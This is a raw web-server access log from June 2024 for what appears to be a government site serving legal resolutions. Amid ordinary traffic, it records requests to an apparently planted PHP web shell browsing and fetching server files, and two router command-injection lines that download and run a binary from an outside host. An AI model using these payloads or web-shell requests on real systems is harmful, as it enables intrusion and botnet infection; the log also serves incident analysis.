201.245.192.253 - - [29/Jun/2024:17:11:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:17:12:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 65651
201.245.192.253 - - [29/Jun/2024:17:12:21 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
20.210.58.100 - - [29/Jun/2024:17:12:24 -0500] "GET /Publicaciones/2024EE17168.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:17:12:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 25653
201.245.192.253 - - [29/Jun/2024:17:12:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 111788
201.245.192.253 - - [29/Jun/2024:17:12:44 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:12:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:13:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:17:13:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 65651
201.245.192.253 - - [29/Jun/2024:17:13:16 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:13:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:13:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:13:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:13:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:13:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:13:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:13:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 59048
201.245.192.253 - - [29/Jun/2024:17:13:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 59048
201.245.192.253 - - [29/Jun/2024:17:13:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
201.245.192.253 - - [29/Jun/2024:17:13:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1568
201.245.192.253 - - [29/Jun/2024:17:13:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1568
216.244.66.195 - - [29/Jun/2024:17:13:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/01304.pdf HTTP/1.1" 200 333906
201.245.192.253 - - [29/Jun/2024:17:13:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 34531
201.245.192.253 - - [29/Jun/2024:17:13:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 47788
201.245.192.253 - - [29/Jun/2024:17:13:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28749
201.245.192.253 - - [29/Jun/2024:17:13:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:13:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:17:14:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 35058
201.245.192.253 - - [29/Jun/2024:17:14:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 34524
47.128.62.213 - - [29/Jun/2024:17:14:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2922.pdf HTTP/1.1" 200 2740
216.244.66.195 - - [29/Jun/2024:17:14:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/01285.pdf HTTP/1.1" 200 431990
47.128.53.65 - - [29/Jun/2024:17:14:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2912.pdf HTTP/1.1" 200 2740
47.128.25.144 - - [29/Jun/2024:17:14:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3700.pdf HTTP/1.1" 200 2741
66.249.66.13 - - [29/Jun/2024:17:14:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1813.pdf HTTP/1.1" 200 283971
66.249.66.13 - - [29/Jun/2024:17:14:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1828.pdf HTTP/1.1" 200 338760
66.249.66.12 - - [29/Jun/2024:17:14:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3584.pdf HTTP/1.1" 200 369834
66.249.66.13 - - [29/Jun/2024:17:14:40 -0500] "GET /BLA/resoluciones/AUTOS%202023/5635.pdf HTTP/1.1" 200 426102
47.128.25.174 - - [29/Jun/2024:17:14:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3499.pdf HTTP/1.1" 200 2716
201.245.192.253 - - [29/Jun/2024:17:14:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.127.68 - - [29/Jun/2024:17:15:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=01674.pdf HTTP/1.1" 200 2741
66.249.66.11 - - [29/Jun/2024:17:15:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6227.pdf HTTP/1.1" 200 571603
47.128.16.84 - - [29/Jun/2024:17:15:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat%5Clib&f=tomcat-api.jar&ft=info HTTP/1.1" 200 3786
47.128.16.84 - - [29/Jun/2024:17:15:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.16.84 - - [29/Jun/2024:17:15:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.16.84 - - [29/Jun/2024:17:15:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.16.84 - - [29/Jun/2024:17:15:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.16.84 - - [29/Jun/2024:17:15:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.16.84 - - [29/Jun/2024:17:15:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jar HTTP/1.1" 200 1034
47.128.16.84 - - [29/Jun/2024:17:15:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.16.84 - - [29/Jun/2024:17:15:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.16.84 - - [29/Jun/2024:17:15:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.16.84 - - [29/Jun/2024:17:15:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.110.19 - - [29/Jun/2024:17:15:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2024%5C&sort=0d HTTP/1.1" 200 9521
47.128.110.19 - - [29/Jun/2024:17:15:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.110.19 - - [29/Jun/2024:17:15:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
172.22.2.4 - - [29/Jun/2024:17:13:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.52.214 - - [29/Jun/2024:17:15:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat%5Cbin&f=service.bat&ft=info HTTP/1.1" 200 3693
47.128.52.214 - - [29/Jun/2024:17:15:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.52.214 - - [29/Jun/2024:17:15:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.52.214 - - [29/Jun/2024:17:15:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.52.214 - - [29/Jun/2024:17:15:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.52.214 - - [29/Jun/2024:17:15:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.52.214 - - [29/Jun/2024:17:15:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.52.214 - - [29/Jun/2024:17:15:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_bat HTTP/1.1" 200 131
47.128.52.214 - - [29/Jun/2024:17:15:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.52.214 - - [29/Jun/2024:17:15:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.52.214 - - [29/Jun/2024:17:15:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.59.15 - - [29/Jun/2024:17:15:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150616-0346-74000.txt&ft=info HTTP/1.1" 200 3621
47.128.59.15 - - [29/Jun/2024:17:15:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.59.15 - - [29/Jun/2024:17:15:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.59.15 - - [29/Jun/2024:17:15:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.59.15 - - [29/Jun/2024:17:15:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.59.15 - - [29/Jun/2024:17:15:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.59.15 - - [29/Jun/2024:17:15:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.59.15 - - [29/Jun/2024:17:15:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.59.15 - - [29/Jun/2024:17:15:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.59.15 - - [29/Jun/2024:17:15:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
201.245.192.253 - - [29/Jun/2024:17:15:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:15:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.17.122 - - [29/Jun/2024:17:16:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5CRESOURCE&f=template.zip&ft=info HTTP/1.1" 200 3822
47.128.17.122 - - [29/Jun/2024:17:16:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.17.122 - - [29/Jun/2024:17:16:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.17.122 - - [29/Jun/2024:17:16:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.17.122 - - [29/Jun/2024:17:16:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.17.122 - - [29/Jun/2024:17:16:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.17.122 - - [29/Jun/2024:17:16:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.17.122 - - [29/Jun/2024:17:16:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.17.122 - - [29/Jun/2024:17:16:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.17.122 - - [29/Jun/2024:17:16:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.17.122 - - [29/Jun/2024:17:16:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_zip HTTP/1.1" 200 577
141.98.83.197 - - [29/Jun/2024:17:16:20 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [29/Jun/2024:17:16:20 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
172.22.2.4 - - [29/Jun/2024:17:14:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53419
176.9.137.113 - - [29/Jun/2024:17:16:35 -0500] "GET /Publicaciones/2023EE02588.pdf HTTP/1.1" 404 227
216.245.221.92 - - [29/Jun/2024:17:16:49 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.12 - - [29/Jun/2024:17:16:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2312.pdf HTTP/1.1" 200 1615592
201.245.192.253 - - [29/Jun/2024:17:16:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:17:16:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2352.pdf HTTP/1.1" 200 510802
66.249.66.13 - - [29/Jun/2024:17:16:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2319.pdf HTTP/1.1" 200 362656
201.245.192.253 - - [29/Jun/2024:17:17:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35403
201.245.192.253 - - [29/Jun/2024:17:17:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35140
201.245.192.253 - - [29/Jun/2024:17:17:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:17:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [29/Jun/2024:17:17:58 -0500] "GET /autoliquidacion/index.php?dir=Cobro%20Evaluacion%20Certificaci%F3n%20Para%20La%20Deducci%F3n%20Por%20Inversi%F3n%20En%20Medio%20Ambiente/&sort=size&order=desc HTTP/1.1" 200 2773
66.249.66.11 - - [29/Jun/2024:17:17:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2485.pdf HTTP/1.1" 200 498500
201.245.192.253 - - [29/Jun/2024:17:18:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.13 - - [29/Jun/2024:17:18:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201651-1700/20021676.tif HTTP/1.1" 200 44472
201.245.192.253 - - [29/Jun/2024:17:18:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:17:18:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1636.pdf HTTP/1.1" 200 624201
186.154.46.227 - - [29/Jun/2024:17:19:00 -0500] "GET /BLA/resoluciones/AUTOS%202023/04830.pdf HTTP/1.1" 200 359220
186.154.46.227 - - [29/Jun/2024:17:19:01 -0500] "GET /BLA/resoluciones/AUTOS%202023/04830.pdf HTTP/1.1" 206 1025
186.154.46.227 - - [29/Jun/2024:17:19:01 -0500] "GET /BLA/resoluciones/AUTOS%202023/04830.pdf HTTP/1.1" 200 359220
201.245.192.253 - - [29/Jun/2024:17:19:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35618
201.245.192.253 - - [29/Jun/2024:17:19:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:19:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [29/Jun/2024:17:20:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2268.pdf HTTP/1.1" 200 663967
201.245.192.253 - - [29/Jun/2024:17:20:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35140
172.22.2.4 - - [29/Jun/2024:17:20:05 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20T-299%20DE%202008.doc HTTP/1.1" 304 -
66.249.66.13 - - [29/Jun/2024:17:20:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20101-150/2002RES140.tif HTTP/1.1" 200 161082
201.245.192.253 - - [29/Jun/2024:17:20:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:17:21:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0937.pdf HTTP/1.1" 200 546396
172.22.2.4 - - [29/Jun/2024:17:19:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Jun/2024:17:21:21 -0500] "POST /BLA/boletinlegal/dns-query HTTP/1.1" 406 -
172.22.2.4 - - [29/Jun/2024:17:21:31 -0500] "POST /BLA/boletinlegal/dns-query HTTP/1.1" 406 -
216.245.221.92 - - [29/Jun/2024:17:21:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:17:21:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:21:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [29/Jun/2024:17:22:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1804.pdf HTTP/1.1" 200 295976
172.22.2.4 - - [29/Jun/2024:17:20:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
40.77.167.7 - - [29/Jun/2024:17:22:47 -0500] "GET /BLA/resoluciones/AUTOS%202022/1498.pdf HTTP/1.1" 200 608391
201.245.192.253 - - [29/Jun/2024:17:22:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:17:23:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0909.pdf HTTP/1.1" 200 601724
201.245.192.253 - - [29/Jun/2024:17:23:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.121.92 - - [29/Jun/2024:17:23:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150710-1615-888000.txt&ft=info HTTP/1.1" 200 3702
47.128.121.92 - - [29/Jun/2024:17:23:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.121.92 - - [29/Jun/2024:17:23:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.121.92 - - [29/Jun/2024:17:23:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.121.92 - - [29/Jun/2024:17:23:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.121.92 - - [29/Jun/2024:17:23:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.121.92 - - [29/Jun/2024:17:23:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.121.92 - - [29/Jun/2024:17:23:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.121.92 - - [29/Jun/2024:17:23:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.121.92 - - [29/Jun/2024:17:23:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
201.245.192.253 - - [29/Jun/2024:17:23:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:23:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [29/Jun/2024:17:24:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0110.pdf HTTP/1.1" 200 1523696
47.128.29.47 - - [29/Jun/2024:17:24:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150903-0433-40000.txt&ft=img&imgsize=20 HTTP/1.1" 200 14742
47.128.29.47 - - [29/Jun/2024:17:24:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.29.47 - - [29/Jun/2024:17:24:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.29.47 - - [29/Jun/2024:17:24:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.29.47 - - [29/Jun/2024:17:24:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.29.47 - - [29/Jun/2024:17:24:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.29.47 - - [29/Jun/2024:17:24:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.29.47 - - [29/Jun/2024:17:24:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.29.47 - - [29/Jun/2024:17:24:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.29.47 - - [29/Jun/2024:17:24:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.123.160 - - [29/Jun/2024:17:24:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.123.160 - - [29/Jun/2024:17:24:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5Cnoticias&sort=0d HTTP/1.1" 200 138775
